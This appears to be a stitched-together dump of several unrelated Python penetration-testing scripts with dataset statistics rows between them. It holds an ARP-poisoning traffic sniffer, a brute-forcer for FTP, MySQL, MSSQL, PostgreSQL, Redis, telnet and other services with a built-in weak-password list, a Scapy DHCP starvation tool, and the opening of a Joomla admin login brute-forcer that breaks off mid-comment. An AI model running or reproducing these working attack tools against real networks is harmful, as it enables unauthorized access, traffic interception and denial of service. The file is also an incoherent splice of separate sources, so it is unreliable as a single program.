self.translationfile = ['ÿ ff', 'a 61', 'b 62', 'c 63', 'd 64', 'e 65', 'f 66', 'g 67', 'h 68', 'i 69', 'j 6a', 'k 6b', 'l 6c', 'm 6d', 'n 6e', 'o 6f', 'p 70', 'q 71', 'r 72', 's 73', 't 74', 'u 75', 'v 76', 'w 77', 'x 78', 'y 79', 'z 7a', 'A 41', 'B 42', 'C 43', 'D 44', 'E 45', 'F 46', 'G 47', 'H 48', 'I 49', 'J 4a', 'K 4b', 'L 4c', 'M 4d', 'N 4e', 'O 4f', 'P 50', 'Q 51', 'R 52', 'S 53', 'T 54', 'U 55', 'V 56', 'W 57', 'X 58', 'Y 59', 'Z 5a', '0 30', '1 31', '2 32', '3 33', '4 34', '5 35', '6 36', '7 37', '8 38', '9 39', 'ˆ 88', '. 00', 'þ fe', '¶ b6', 'ž 9e', 'Ñ d1', 'Ë cb', '@ 40', ': 3a',"' 27",'" 22', "/ 2f", '\\ 5c', '$ 24', '% 25', '^ 5e', '& 26', '* 2a', '( 28', ') 29', '[ 5b', '] 5d', '{ 7b', '} 7d', 'ù f9', '© a9', 'À c0', 'ª aa', '¾ be', 'Û db', 'Ç c7']
self.logfile = "captured_traffic.txt"
print(f"[+] All Traffic Will be Logged.\n[+] Log File: {self.logfile}")
if self.poison is not None:
self.arp_poison = ARP_Poisoner(self.poison, "192.168.0.1")
self.arp_poisoner = threading.Thread(target=self.arp_poison.arp_poison)
self.arp_poisoner.start()
if self.os == "nt":
try:
self.sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
self.sniffer.bind((socket.gethostbyname(socket.gethostname()), 0))
self.sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
self.sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
except:
print("[+] Error with binding socket.")
print("[+] Run this script as admin!")
sys.exit()
else:
self.sniffer = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
def eth_header(self, data):
storeobj = data
storeobj = struct.unpack("!6s6sH", storeobj)
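        # "!6s6sH" = 6-byte destination MAC, 6-byte source MAC, 2-byte EtherType (network byte order)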
destination_mac = binascii.hexlify(storeobj[0])
source_mac = binascii.hexlify(storeobj[1])
eth_protocol = storeobj[2]
dest_mac = ""
src_mac = ""
try:
item = 0
for i in source_mac.decode():
src_mac += i
item += 1
if item == 2:
item = 0
src_mac += ":"
item = 0
for i in destination_mac.decode():
dest_mac += i
item += 1
if item == 2:
item = 0
dest_mac += ":"
except:
pass
data = {"Source Mac": src_mac,
"Destination Mac": dest_mac,
"Protocol": eth_protocol}
return data
def ip_header(self, data):
storeobj = struct.unpack("!BBHHHBBH4s4s", data)
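        # "!BBHHHBBH4s4s" = version/IHL, TOS, total length, identification,
        # flags/fragment offset, TTL, protocol, header checksum, source IP, destination IP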
version = storeobj[0]
tos = storeobj[1]
total_length = storeobj[2]
identification = storeobj[3]
fragment_Offset = storeobj[4]
ttl = storeobj[5]
protocol = storeobj[6]
header_checksum = storeobj[7]
source_address = socket.inet_ntoa(storeobj[8])
destination_address = socket.inet_ntoa(storeobj[9])
data = {'Version': version,
"Tos": tos,
"Total Length": total_length,
"Identification": identification,
"Fragment": fragment_Offset,
"TTL": ttl,
"Protocol": protocol,
"Header CheckSum": header_checksum,
"Source Address": source_address,
"Destination Address": destination_address}
return data
def tcp_header(self, data):
storeobj = struct.unpack('!HHLLBBHHH', data)
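        # '!HHLLBBHHH' = source port, destination port, sequence, acknowledgement,
        # data offset/reserved, flags, window, checksum, urgent pointer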
source_port = storeobj[0]
destination_port = storeobj[1]
sequence_number = storeobj[2]
acknowledge_number = storeobj[3]
offset_reserved = storeobj[4]
tcp_flag = storeobj[5]
window = storeobj[6]
checksum = storeobj[7]
urgent_pointer = storeobj[8]
data = {"Source Port": source_port,
"Destination Port": destination_port,
"Sequence Number": sequence_number,
"Acknowledge Number": acknowledge_number,
"Offset & Reserved": offset_reserved,
"TCP Flag": tcp_flag,
"Window": window,
"CheckSum": checksum,
"Urgent Pointer": urgent_pointer
}
return data
def translatebyte(self, byte):
result = ""
flag = 0
for i in self.translationfile:
if byte in i:
i = i.split()
flag = 1
return i[0]
if flag == 0:
return "."
def translate(self, datas, src_ip, dst_ip):
result = ""
split_data = ""
item = 0
for i in datas:
split_data += i
item += 1
if item == 2:
split_data += " "
item = 0
for data in split_data.split():
add = self.translatebyte(data)
result += add
if self.raw:
print(f"\n[+]: Raw Network Traffic:")
print(f" {split_data}")
self.log(f"\n[(RAW)({src_ip})---->({dst_ip})]: {split_data}\n[(DECODED)({src_ip})---->({dst_ip})]: {result}")
return result
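    # A shorter standard-library equivalent of the table-driven decode above
    # (illustrative sketch only, not used by the class):
    # def translate_stdlib(hexstring):
    #     raw = binascii.unhexlify(hexstring)
    #     return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in raw)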
def log(self, item):
        # append to the log file (created on first write)
        file = open(self.logfile, "a")
        file.write(item)
        file.close()
def sniffing(self):
while True:
try:
if self.hastarget:
desired_target = False
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
                    if self.raw:
                        print(f"\n[+] Raw Packets Received: {pkt}")
for i in self.eth_header(pkt[0][0:14]).items():
a, b = i
                        if desired_target:
                            print(f"[+] {a} | {b}")
                            if self.logger:
                                self.log(f"\n[+] {a} | {b}")
                        elif self.targ_mac in b:
                            msg = "\n[+] Ethernet Header:"
                            print(msg)
                            print(f"[+] {a} | {b}")
                            desired_target = True
                            if self.logger:
                                self.log(msg)
                                self.log(f"\n[+] {a} | {b}")
                        else:
                            break
if desired_target:
msg = "\n[+] IP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.ip_header(pkt[0][14:34]).items():
a, b = i
print(f"[+] {a} | {b}")
if "Source Address" in a.strip():
src_ip = b
if "Destination Address" in a.strip():
dst_ip = b
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] TCP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.tcp_header(pkt[0][34:54]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
if self.translat:
try:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
print(
"\n[+] Translation Of Network Traffic(gibberish most likely means encrypted traffic):")
print(" ", translation)
except Exception as e:
print("[+] Error with translation.")
else:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
else:
pkt = self.sniffer.recvfrom(65565)
self.log(f"\n\n[(RECV)] Raw Packets Received: {pkt}")
if self.raw:
print(f"\n[+] Raw Packets Recieved: {pkt}")
msg = "\n[+] Ethernet Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.eth_header(pkt[0][0:14]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] IP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.ip_header(pkt[0][14:34]).items():
a, b = i
print(f"[+] {a} | {b}")
if "Source Address" in a.strip():
src_ip = b
if "Destination Address" in a.strip():
dst_ip = b
if self.logger:
self.log(f"\n[+] {a} | {b}")
msg = "\n[+] TCP Header:"
print(msg)
if self.logger:
self.log(msg)
for i in self.tcp_header(pkt[0][34:54]).items():
a, b = i
print(f"[+] {a} | {b}")
if self.logger:
self.log(f"\n[+] {a} | {b}")
if self.translat:
try:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
print(
"\n[+] Translation Of Network Traffic(gibberish most likely means encrypted traffic):")
print(" ", translation)
except Exception as e:
print("[+] Error with translation.")
else:
translation = self.translate(binascii.hexlify(pkt[0]).decode(), src_ip, dst_ip)
            except KeyboardInterrupt:
                print("[+] Stopping Script......\n")
                # only undo ARP poisoning if it was actually started (-p option)
                if self.poison is not None:
                    self.arp_poison.restore_arp(self.arp_poison.gate_ip, self.arp_poison.gate_mac, self.arp_poison.targ_ip, self.arp_poison.targ_mac)
                    self.arp_poison.restore_arp(self.arp_poison.targ_ip, self.arp_poison.targ_mac, self.arp_poison.gate_ip, self.arp_poison.gate_mac)
                break
except Exception as e:
self.log(f"\n[(ERROR]: {e}")
parser = OptionParse() | 43.91601 | 783 | 0.433731 |
PenetrationTestingScripts | #coding:utf-8
import getopt
import sys
import Queue
import threading
import socket
import urllib2
import time
import os
import re
import ftplib
import hashlib
import struct
import binascii
import telnetlib
import array
queue = Queue.Queue()
mutex = threading.Lock()
TIMEOUT = 10
I = 0
USER_DIC = {
"ftp":['www','admin','root','db','wwwroot','data','web','ftp'],
"mysql":['root'],
"mssql":['sa'],
"telnet":['administrator','admin','root','cisco'],
"postgresql":['postgres','admin'],
"redis":['null'],
"mongodb":['null'],
"memcached":['null'],
"elasticsearch":['null']
}
PASSWORD_DIC = ['123456','admin','root','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2016','{user}2015','{user}!','','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','fuckyou','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!','p@ssw0rd!','password1','r00t','tomcat','apache','system']
REGEX = [['ftp', '21', '^220.*?ftp|^220-|^220 Service|^220 FileZilla'], ['telnet', '23', '^\\xff[\\xfa-\\xfe]|^\\x54\\x65\\x6c|Telnet'],['mssql', '1433', ''], ['mysql', '3306', '^.\\0\\0\\0.*?mysql|^.\\0\\0\\0\\n|.*?MariaDB server'], ['postgresql', '5432', ''], ['redis', '6379', '-ERR|^\\$\\d+\\r\\nredis_version'], ['elasticsearch', '9200', ''], ['memcached', '11211', '^ERROR'], ['mongodb', '27017', '']]
class Crack():
def __init__(self,ip,port,server,timeout):
self.ip = ip
self.port = port
self.server = server
self.timeout = timeout
def run(self):
user_list = USER_DIC[self.server]
#print user_list
for user in user_list:
for pass_ in PASSWORD_DIC:
pass_ = str(pass_.replace('{user}', user))
k = getattr(self,self.server)
result = k(user,pass_)
if result:return result
def ftp(self,user,pass_):
try:
ftp=ftplib.FTP()
ftp.connect(self.ip,self.port)
ftp.login(user,pass_)
if user == 'ftp':return "anonymous"
return "username:%s,password:%s"%(user,pass_)
except Exception,e:
pass
def mysql(self,user,pass_):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((self.ip,int(self.port)))
packet = sock.recv(254)
plugin,scramble = self.get_scramble(packet)
if not scramble:return 3
auth_data = self.get_auth_data(user,pass_,scramble,plugin)
sock.send(auth_data)
result = sock.recv(1024)
if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00":
return "username:%s,password:%s" % (user,pass_)
def postgresql(self,user,pass_):#author:hos@YSRC
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((self.ip,int(self.port)))
packet_length = len(user) + 7 +len("\x03user database postgres application_name psql client_encoding UTF8 ")
p="%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c"%( 0,0,0,packet_length,0,0,0,0,user,0,0,0,0,0,0,0,0)
sock.send(p)
packet = sock.recv(1024)
psql_salt=[]
if packet[0]=='R':
a=str([packet[4]])
b=int(a[4:6],16)
authentication_type=str([packet[8]])
c=int(authentication_type[4:6],16)
if c==5:psql_salt=packet[9:]
else:return 3
buf=[]
salt = psql_salt
lmd5= self.make_response(buf,user,pass_,salt)
packet_length1=len(lmd5)+5+len('p')
pp='p%c%c%c%c%s%c'%(0,0,0,packet_length1 - 1,lmd5,0)
sock.send(pp)
packet1 = sock.recv(1024)
if packet1[0] == "R":
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
def redis(self,user,pass_):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("INFO\r\n")
result = s.recv(1024)
if "redis_version" in result:
return "unauthorized"
elif "Authentication" in result:
for pass_ in PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("AUTH %s\r\n"%(pass_))
result = s.recv(1024)
if '+OK' in result:
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
def mssql(self,user,pass_):#author:hos@YSRC
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.ip,self.port))
hh=binascii.b2a_hex(self.ip)
husername=binascii.b2a_hex(user)
lusername=len(user)
lpassword=len(pass_)
ladd=len(self.ip)+len(str(self.port))+1
hladd=hex(ladd).replace('0x','')
hpwd=binascii.b2a_hex(pass_)
pp=binascii.b2a_hex(str(self.port))
address=hh+'3a'+pp
hhost= binascii.b2a_hex(self.ip)
data="0200020000000000123456789000000000000000000000000000000000000000000000000000ZZ5440000000000000000000000000000000000000000000000000000000000X3360000000000000000000000000000000000000000000000000000000000Y373933340000000000000000000000000000000000000000000000000000040301060a09010000000002000000000070796d7373716c000000000000000000000000000000000000000000000007123456789000000000000000000000000000000000000000000000000000ZZ3360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Y0402000044422d4c6962726172790a00000000000d1175735f656e676c69736800000000000000000000000000000201004c000000000000000000000a000000000000000000000000000069736f5f31000000000000000000000000000000000000000000000000000501353132000000030000000000000000"
data1=data.replace(data[16:16+len(address)],address)
data2=data1.replace(data1[78:78+len(husername)],husername)
data3=data2.replace(data2[140:140+len(hpwd)],hpwd)
if lusername>=16:
data4=data3.replace('0X',str(hex(lusername)).replace('0x',''))
else:
data4=data3.replace('X',str(hex(lusername)).replace('0x',''))
if lpassword>=16:
data5=data4.replace('0Y',str(hex(lpassword)).replace('0x',''))
else:
data5=data4.replace('Y',str(hex(lpassword)).replace('0x',''))
hladd = hex(ladd).replace('0x', '')
data6=data5.replace('ZZ',str(hladd))
data7=binascii.a2b_hex(data6)
sock.send(data7)
packet=sock.recv(1024)
if 'master' in packet:
return "username:%s,password:%s" % (user,pass_)
except:
return 3
def mongodb(self,user,pass_):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000")
s.send(data)
result = s.recv(1024)
if "ismaster" in result:
getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000")
s.send(getlog_data)
result = s.recv(1024)
if "totalLinesWritten" in result:
return "unauthorized"
else:return 3
except Exception,e:
return 3
def memcached(self,user,pass_):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip,int(self.port)))
s.send("stats\r\n")
result = s.recv(1024)
if "version" in result:
return "unauthorized"
def elasticsearch(self,user,pass_):
url = "http://"+self.ip+":"+str(self.port)+"/_cat"
data = urllib2.urlopen(url).read()
if '/_cat/master' in data:
return "unauthorized"
else:
return 3
def telnet(self,user,pass_):
try:
tn = telnetlib.Telnet(self.ip,self.port,self.timeout)
#tn.set_debuglevel(3)
time.sleep(0.5)
os = tn.read_some()
except Exception ,e:
return 3
user_match="(?i)(login|user|username)"
pass_match='(?i)(password|pass)'
login_match='#|\$|>'
if re.search(user_match,os):
try:
tn.write(str(user)+'\r\n')
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
pass
else:
try:
info=tn.read_until(user_match,timeout=2)
except Exception,e:
return 3
if re.search(user_match,info):
try:
tn.write(str(user)+'\r\n')
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "username:%s,password:%s" % (user,pass_)
except Exception,e:
return 3
elif re.search(pass_match,info):
tn.read_until(pass_match,timeout=2)
tn.write(str(pass_)+'\r\n')
login_info=tn.read_until(login_match,timeout=3)
tn.close()
if re.search(login_match,login_info):
return "password:%s" % (pass_)
def get_hash(self,password, scramble):
hash_stage1 = hashlib.sha1(password).digest()
hash_stage2 = hashlib.sha1(hash_stage1).digest()
to = hashlib.sha1(scramble+hash_stage2).digest()
reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)]
hash = struct.pack('20B', *reply)
return hash
def get_scramble(self,packet):
scramble,plugin = '',''
try:
tmp = packet[15:]
m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp)
if len(m)>3:del m[0]
scramble = m[0] + m[1]
except:
return '',''
try:
plugin = m[2]
except:
pass
return plugin,scramble
def get_auth_data(self,user,password,scramble,plugin):
user_hex = binascii.b2a_hex(user)
pass_hex = binascii.b2a_hex(self.get_hash(password,scramble))
data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex
if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634"
len_hex = hex(len(data)/2).replace("0x","")
auth_data = len_hex + "000001" +data
return binascii.a2b_hex(auth_data)
def make_response(self,buf,username,password,salt):
pu=hashlib.md5(password+username).hexdigest()
buf=hashlib.md5(pu+salt).hexdigest()
return 'md5'+buf
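    # make_response builds PostgreSQL's md5 auth response:
    #   'md5' + md5_hex( md5_hex(password + username) + salt )
    # which is what the server expects after an AuthenticationMD5Password (type 5) request.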
class SendPingThr(threading.Thread):
def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3):
threading.Thread.__init__(self)
self.Sock = icmpSocket
self.ipPool = ipPool
self.packet = icmpPacket
self.timeout = timeout
self.Sock.settimeout(timeout + 1)
def run(self):
time.sleep(0.01)
for ip in self.ipPool:
try:
self.Sock.sendto(self.packet, (ip, 0))
except socket.timeout:
break
time.sleep(self.timeout)
class Nscan:
def __init__(self, timeout=3):
self.timeout = timeout
self.__data = struct.pack('d', time.time())
self.__id = os.getpid()
if self.__id >= 65535:self.__id = 65534
@property
def __icmpSocket(self):
Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
return Sock
def __inCksum(self, packet):
if len(packet) & 1:
packet = packet + '\0'
words = array.array('h', packet)
sum = 0
for word in words:
sum += (word & 0xffff)
sum = (sum >> 16) + (sum & 0xffff)
sum = sum + (sum >> 16)
return (~sum) & 0xffff
@property
def __icmpPacket(self):
header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0)
packet = header + self.__data
chkSum = self.__inCksum(packet)
header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0)
return header + self.__data
def mPing(self, ipPool):
Sock = self.__icmpSocket
Sock.settimeout(self.timeout)
packet = self.__icmpPacket
recvFroms = set()
sendThr = SendPingThr(ipPool, packet, Sock, self.timeout)
sendThr.start()
while True:
try:
ac_ip = Sock.recvfrom(1024)[1][0]
if ac_ip not in recvFroms:
log("active",ac_ip,0,None)
recvFroms.add(ac_ip)
except Exception:
pass
finally:
if not sendThr.isAlive():
break
return recvFroms & ipPool
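# Stand-alone use of the ICMP sweep (raw sockets need root; addresses are placeholders):
#   alive = Nscan(timeout=3).mPing(set(['192.168.1.1', '192.168.1.2']))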
def get_ac_ip(ip_list):
try:
s = Nscan()
ipPool = set(ip_list)
return s.mPing(ipPool)
except Exception,e:
print 'The current user permissions unable to send icmp packets'
return ip_list
class ThreadNum(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
try:
if queue.empty():break
queue_task = self.queue.get()
except:
break
try:
task_type,task_host,task_port = queue_task.split(":")
if task_type == 'portscan':
data = scan_port(task_host,task_port)
if data:
server_name = server_discern(task_host,task_port,data)
if server_name:
log('discern',task_host,task_port,server_name)
queue.put(":".join([server_name,task_host,task_port]))
else:
result = pass_crack(task_type,task_host,task_port)
if result and result !=3:log(task_type,task_host,task_port,result)
except Exception,e:
continue
def scan_port(host,port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((str(host),int(port)))
log('portscan',host,port)
except Exception,e:
return False
try:
data = sock.recv(512)
if len(data) > 2:
return data
else:
sock.send('a\n\n')
data = sock.recv(512)
sock.close()
if len(data) > 2:
return data
else:
return 'NULL'
except Exception,e:
sock.close()
return 'NULL'
def log(scan_type,host,port,info=''):
mutex.acquire()
time_str = time.strftime('%X', time.localtime( time.time()))
if scan_type == 'portscan':
print "[%s] %s:%d open"%(time_str,host,int(port))
elif scan_type == 'discern':
print "[%s] %s:%d is %s"%(time_str,host,int(port),info)
elif scan_type == 'active':
print "[%s] %s active" % (time_str, host)
elif info:
log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info)
print log
log_file = open('result.log','a')
log_file.write(log+"\r\n")
log_file.close()
mutex.release()
def server_discern(host,port,data):
for mark_info in REGEX:
try:
name,default_port,reg = mark_info
            if reg and data != 'NULL':
matchObj = re.search(reg,data,re.I|re.M)
if matchObj:
return name
elif int(default_port) == int(port):
return name
except Exception,e:
#print e
continue
def pass_crack(server_type,host,port):
m = Crack(host,port,server_type,TIMEOUT)
return m.run()
def get_password_dic(path):
pass_list = []
try:
file_ = open(path,'r')
for password in file_:
pass_list.append(password.strip())
file_.close()
return pass_list
except:
return 'read dic error'
def get_ip_list(ip):
ip_list = []
iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
if '-' in ip:
ip_range = ip.split('-')
ip_start = long(iptonum(ip_range[0]))
ip_end = long(iptonum(ip_range[1]))
ip_count = ip_end - ip_start
if ip_count >= 0 and ip_count <= 65536:
for ip_num in range(ip_start,ip_end+1):
ip_list.append(numtoip(ip_num))
else:
print '-h wrong format'
elif '.ini' in ip:
ip_config = open(ip,'r')
for ip in ip_config:
ip_list.extend(get_ip_list(ip.strip()))
ip_config.close()
else:
ip_split=ip.split('.')
net = len(ip_split)
if net == 2:
for b in range(1,255):
for c in range(1,255):
ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c)
ip_list.append(ip)
elif net == 3:
for c in range(1,255):
ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c)
ip_list.append(ip)
elif net ==4:
ip_list.append(ip)
else:
print "-h wrong format"
return ip_list
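# Accepted -h formats (see msg below): "192.168.1" sweeps the whole /24,
# "192.168" the whole B-class range, "10.0.0.1-10.0.0.254" an inclusive range
# (capped at 65536 addresses), and a path ending in .ini is read as one such
# entry per line.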
def t_join(m_count):
tmp_count = 0
i = 0
if I < m_count:
count = len(ip_list) + 1
else:
count = m_count
while True:
time.sleep(4)
ac_count = threading.activeCount()
#print ac_count,count
if ac_count < count and ac_count == tmp_count:
i+=1
else:
i=0
tmp_count = ac_count
#print ac_count,queue.qsize()
if (queue.empty() and threading.activeCount() <= 1) or i > 5:
break
def put_queue(ip_list,port_list):
for ip in ip_list:
for port in port_list:
queue.put(":".join(['portscan',ip,port]))
if __name__=="__main__":
msg = '''
Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n]
'''
if len(sys.argv) < 2:
print msg
try:
options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n")
ip = ''
port = '21,23,1433,3306,5432,6379,9200,11211,27017'
m_count = 100
ping = True
for opt,arg in options:
if opt == '-h':
ip = arg
elif opt == '-p':
port = arg
elif opt == '-m':
m_count = int(arg)
elif opt == '-t':
TIMEOUT = int(arg)
elif opt == '-n':
ping = False
elif opt == '-d':
PASSWORD_DIC = get_password_dic(arg)
socket.setdefaulttimeout(TIMEOUT)
if ip:
ip_list = get_ip_list(ip)
if ping:ip_list = get_ac_ip(ip_list)
port_list = port.split(',')
for ip_str in ip_list:
for port_int in port_list:
I+=1
queue.put(':'.join(['portscan',ip_str,port_int]))
for i in range(m_count):
t = ThreadNum(queue)
t.setDaemon(True)
t.start()
t_join(m_count)
except Exception,e:
print msg
| 39.358238 | 1,195 | 0.548799 |
Hands-On-Penetration-Testing-with-Python | a=44
b=33
if a > b:
print("a is greater")
| 7.8 | 22 | 0.581395 |
Python-Penetration-Testing-Cookbook | """DHCP starvation tool built with Scapy.
Attributes:
    ip (list): IP addresses the DHCP server has acknowledged so far.
    mac (list): Spoofed source MAC addresses generated so far.
"""
from scapy.all import *
from time import sleep
from threading import Thread
mac = [""]
ip = []
def callback_dhcp_handle(pkt):
"""Summary.
Args:
pkt (TYPE): Description
"""
if pkt.haslayer(DHCP):
if pkt[DHCP].options[0][1] == 5 and pkt[IP].dst != "192.168.1.38":
ip.append(pkt[IP].dst)
print(str(pkt[IP].dst) + " registered")
elif pkt[DHCP].options[0][1] == 6:
print("NAK received")
def sniff_udp_packets():
"""Summary."""
sniff(filter="udp and (port 67 or port 68)",
prn=callback_dhcp_handle,
store=0)
def occupy_ip():
"""Summary."""
for i in range(250):
requested_addr = "192.168.1." + str(2 + i)
if requested_addr in ip:
continue
src_mac = ""
while src_mac in mac:
src_mac = RandMAC()
mac.append(src_mac)
pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000)
pkt /= DHCP(options=[("message-type", "request"),
("requested_addr", requested_addr),
("server_id", "192.168.1.1"),
"end"])
sendp(pkt)
pkt.show()
print("Trying to occupy " + requested_addr)
sleep(0.2) # interval to avoid congestion and packet loss
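# Each forged packet above is a DHCP REQUEST sent from a fresh random MAC, so the
# server reserves one more lease; callback_dhcp_handle then counts the ACKs
# (message-type 5) and reports any NAKs (message-type 6).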
def main():
"""Summary."""
thread = Thread(target=sniff_udp_packets)
thread.start()
print("Starting DHCP starvation...")
    # Keep starving until 100 leases have been acknowledged by the server
while len(ip) < 100:
occupy_ip()
print("Targeted IP address starved")
main()
| 24.36 | 74 | 0.535508 |
PenTestScripts | #!/usr/bin/env python
# This script implements basic controls for a Boxee xbmc device
# Play both pauses and plays a video.
# Everything else should be straightforward
import argparse
import sys
import urllib2
def cli_parser():
# Command line argument parser
parser = argparse.ArgumentParser(
add_help=False,
description="Boxee_Control is a script that lets you control Boxee and XBMC devides. Supported commands are Play/Pause, OK/Enter, Stop, Left, Right, Down, Up.")
parser.add_argument(
"--ip", metavar='192.168.199.23',
help="IP address of boxee/xbmc device.")
parser.add_argument(
"--port", metavar='8800', default='8800',
help="Specify port value, default is 8800.")
parser.add_argument(
"--command", '-c', metavar="Play",
help="Command to issue. Supported Commands: Play, Pause, Stop, Left, Right, Down, Up, Ok, Enter, Rewind, Fastforward.")
parser.add_argument(
'-h', '-?', '--h', '-help', '--help', action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.h:
parser.print_help()
sys.exit()
return args
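# Example invocation (script name and IP are placeholders):
#   python Boxee_Control.py --ip 192.168.199.23 --command Play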
if __name__ == '__main__':
# Begin parsing command line options
cli_args = cli_parser()
xbmc_system = "http://" + cli_args.ip + ":" + cli_args.port
if cli_args.command.lower().strip() == "play" or cli_args.command.lower().strip() == "pause":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Pause()'
elif cli_args.command.lower() == "stop":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Stop()'
elif cli_args.command.lower() == "ok" or cli_args.command.lower() == "enter":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF00D)'
elif cli_args.command.lower() == "right":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF027)'
elif cli_args.command.lower() == "left":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF025)'
elif cli_args.command.lower() == "down":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF028)'
elif cli_args.command.lower() == "up":
xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF026)'
elif cli_args.command.lower() == "rewind":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Action(78)'
elif cli_args.command.lower() == "fastforward":
xbmc_command = '/xbmcCmds/xbmcHttp?command=Action(77)'
else:
print "You didn't specify a supported command. Please only use:"
print "play, pause, ok, enter, up, down, left, right, rewind, or fastworward"
sys.exit()
full_url = xbmc_system + xbmc_command
# Send the command
urllib2.urlopen(full_url)
| 36.680556 | 168 | 0.637537 |
cybersecurity-penetration-testing | import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
# general settings
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None
# target specific settings
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field= "username"
password_field= "passwd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
tag_value = None
for name,value in attrs:
if name == "name":
tag_name = value
if name == "value":
tag_value = value
if tag_name is not None:
                self.tag_results[tag_name] = tag_value
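# BruteParser harvests every <input name=...> it sees so the login POST below can
# echo back hidden fields (e.g. the per-session token Joomla embeds in its login
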